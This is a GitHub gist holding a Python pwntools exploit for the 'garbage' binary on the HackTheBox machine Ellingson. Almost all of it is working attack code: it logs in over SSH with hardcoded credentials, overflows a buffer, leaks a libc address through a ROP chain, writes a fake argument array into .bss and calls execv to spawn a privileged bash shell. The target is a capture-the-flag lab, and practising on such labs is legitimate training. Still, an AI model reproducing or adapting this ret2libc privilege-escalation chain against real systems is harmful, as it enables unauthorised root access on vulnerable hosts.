Last active
December 11, 2019 01:13
-
-
Save KaoRz/b05bb143a628736c423aa6353b94fd7a to your computer and use it in GitHub Desktop.
Garbage - Exploiting | Ellingson privilege escalation, HackTheBox
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os, sys | |
from pwn import * | |
HOST = '10.10.10.139' | |
USER = 'margo' | |
PASS = 'iamgod$08' | |
LOCAL = False | |
elf = ELF('./garbage') | |
context.terminal = ['tmux', 'sp', '-h'] | |
# context.log_level = 'DEBUG' | |
if LOCAL == True: | |
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec = False) | |
io = process(elf.path, stdin = PTY) | |
else: | |
libc = ELF('./libc.so.6', checksec = False) | |
f = open('/dev/null', 'w') | |
sys.stderr = f | |
shell = ssh(USER, HOST, password = PASS) | |
io = shell.run('/usr/bin/garbage') | |
leak = flat( | |
'A' * 136, | |
0x40179b, # 0x000000000040179b : pop rdi ; ret | |
elf.got['puts'], | |
elf.sym['puts'], | |
0x40179b, # 0x000000000040179b : pop rdi ; ret | |
0x404100, # .bss + 48 | |
elf.sym['gets'], | |
0x401016, # 0x0000000000401016 : ret <Alignment> | |
0x401619, # .text:0000000000401619 : push rbp (main) | |
endianness = 'little', word_size = 64, sign = False) | |
io.sendlineafter('access password: ', leak) | |
io.recvuntil('denied.\n') | |
leak = u64(io.recvline()[:-1].ljust(8, '\x00')) | |
libc.address = leak - libc.sym['puts'] | |
log.success('Leaked puts@@GLIBC: ' + hex(leak)) | |
log.info('GLIBC base address: ' + hex(libc.address)) | |
log.info('GLIBC execv address: ' + hex(libc.sym['execv'])) | |
fake_array = '' | |
fake_array += p64(0x404100 + 24) | |
fake_array += p64(0x404100 + 34) | |
fake_array += '\x00' * 8 | |
fake_array += '/bin/bash\x00-p' | |
sleep(0.5) | |
io.sendline(fake_array) | |
shell = flat( | |
'A' * 136, | |
0x40179b, # 0x000000000040179b : pop rdi ; ret | |
0x404100 + 24, # .bss + 72 ('/bin/bash') | |
0x401799, # 0x0000000000401799 : pop rsi ; pop r15 ; ret | |
0x404100, # .bss + 48 | |
'A' * 8, # Junk | |
0x401016, # 0x0000000000401016 : ret <Alignment> | |
libc.sym['execv'], | |
endianness = 'little', word_size = 64, sign = False) | |
log.progress('Spawning shell...') | |
io.sendlineafter('access password: ', shell) | |
io.recv() | |
io.interactive() | |
io.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment